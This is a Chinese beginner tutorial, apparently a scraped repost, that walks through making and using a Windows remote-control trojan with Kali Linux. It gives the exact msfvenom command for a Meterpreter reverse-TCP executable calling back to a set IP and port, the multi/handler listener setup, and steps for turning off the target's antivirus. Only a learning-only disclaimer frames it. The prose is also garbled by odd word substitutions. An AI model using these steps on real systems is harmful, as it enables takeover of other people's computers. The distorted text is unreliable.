网络安全技能新手入门:利用Kali Linux天生简单的远程控制木马
目次前言
一、天生远控木马
二、流传木马(实际中通过免杀技能进行流传,此文章为新手入门教程,故通过关闭杀毒程序的方法让初学者熟悉流程)
三、配置攻击模块
四、进行远程控制
五、建议
前言
相关法律声明:《中华人民共和国网络安全法》第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、盗取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、盗取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技能支持、广告推广、付出结算等帮助。
本文仅用于学习用途,读者应当不流传病毒以及做一些危害公共安全的行为,若读者利用所学对公共安全产生危害则与本人无关。
实行之前需要准备好的东西:1.安装好kali Linux 2.设置好靶机(可以是假造机/物理机) 3.保证攻击机和靶机之间可以大概ping通 4.本次天生的木马比力简单,所以需要关闭一些杀毒程序
总的来说:分为以下步调 1.天生木马 2.将木马流传到靶机 3.在攻击机中配置攻击模块 4.进行远程控制
一、天生远控木马
输入命令:sudo su
https://img-blog.csdnimg.cn/direct/eb8d3c41c28a4b4ca6e649b43eddf274.png
输入命令:msfconsole
https://img-blog.csdnimg.cn/direct/f83df9ba5bc546949d69142fd54c3aef.png
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe
https://img-blog.csdnimg.cn/direct/5bab8ce8660d44988627d1bd36524ff8.png
参数寄义:-p:payload -f:format -o:output
运行结果如下:
https://img-blog.csdnimg.cn/direct/f877f8ab32f245589b0b314c7ad04112.png
查看病毒:
https://img-blog.csdnimg.cn/direct/124634f8f85b4aca8af94b5bd4f5272a.pnghttps://img-blog.csdnimg.cn/direct/1aea97cbc74c4245b455a2b56ee21b93.png
二、流传木马(实际中通过免杀技能进行流传,此文章为新手入门教程,故通过关闭杀毒程序的方法让初学者熟悉流程)
1.关闭杀毒程序
杀毒程序包罗一些杀毒软件以及电脑自己的防毒程序
因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑自己的杀毒程序的关闭
tips:新手阶段一样寻常都用windows7,因为其漏洞比力多,一样寻常不需要关闭电脑原有的杀毒程序,win10以上一样寻常都需要关闭杀毒程序
步调如下:
https://img-blog.csdnimg.cn/direct/29f776bbd77e48259313e5c7995eae70.png
https://img-blog.csdnimg.cn/direct/c26214d20a0f45dd9ebf52e96475adb3.png
https://img-blog.csdnimg.cn/direct/7e91db689aab4d7d9e7aa55b2b510e03.png
完成以上步调之后就可以将天生的木马放到假造机上的靶机或者物理机上(随便放到哪里都行)
tips:要在假造机和物理机上传输文件的话,需要利用文件传输工具或者下载VMware tools,具体方法这里就不介绍了
三、配置攻击模块
输入命令:use exploit/multi/handler
https://img-blog.csdnimg.cn/direct/884bfabd8423429a9723eb5f31f33dd9.png
输入命令:show options
https://img-blog.csdnimg.cn/direct/0812a830d21847a782199d7d68923431.png
下图为输入show option之后的结果:
https://img-blog.csdnimg.cn/direct/aad8b7ae027542f88478cade15b9404e.png
正式配置:
输入命令:set payload windows/x64/meterpreter/reverse_tcp
设置模块的载荷
https://img-blog.csdnimg.cn/direct/1392cf1b08e6405a87ad362303e9347a.png
输入命令:set lhost 192.168.10.147
设置攻击机的ip地点,该ip地点为读者所使用的Kali Linux的地点
https://img-blog.csdnimg.cn/direct/3e3454f31af3488baeb74d7108130577.png
输入命令:set lport 9999
设置监听的端口,该端口应该同天生木马时所使用的端口同等
https://img-blog.csdnimg.cn/direct/979bc2b245304ba9acb1377503a94b15.png
配置完成之后的厘革如下:
https://img-blog.csdnimg.cn/direct/6ae92d6ae3164494b9e9d102d5d01108.png
四、进行远程控制
tips:无法进行远程控制有以下几个原因
<1>.两台呆板无法ping通
<2>.读者所设置的监听端口被占用
<3>.杀毒程序没有关好
正式进行控制:
1.在攻击机中运行攻击模块
输入命令:run
https://img-blog.csdnimg.cn/direct/fef96b2e9a954799b70208779878b340.png
2.在靶机中打开天生的木马文件
https://img-blog.csdnimg.cn/direct/9a40dc3c65c34d1e9fdc7f4417124880.png
3.成功获取靶机控制权
https://img-blog.csdnimg.cn/direct/5a86fe9c893b487eaef87ca06c19651a.png
五、建议
读者阅读的时间要偏重明确步调之间的逻辑关系,偏重明确每一步的寄义。并且接待读者们指出文章中存在的问题。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]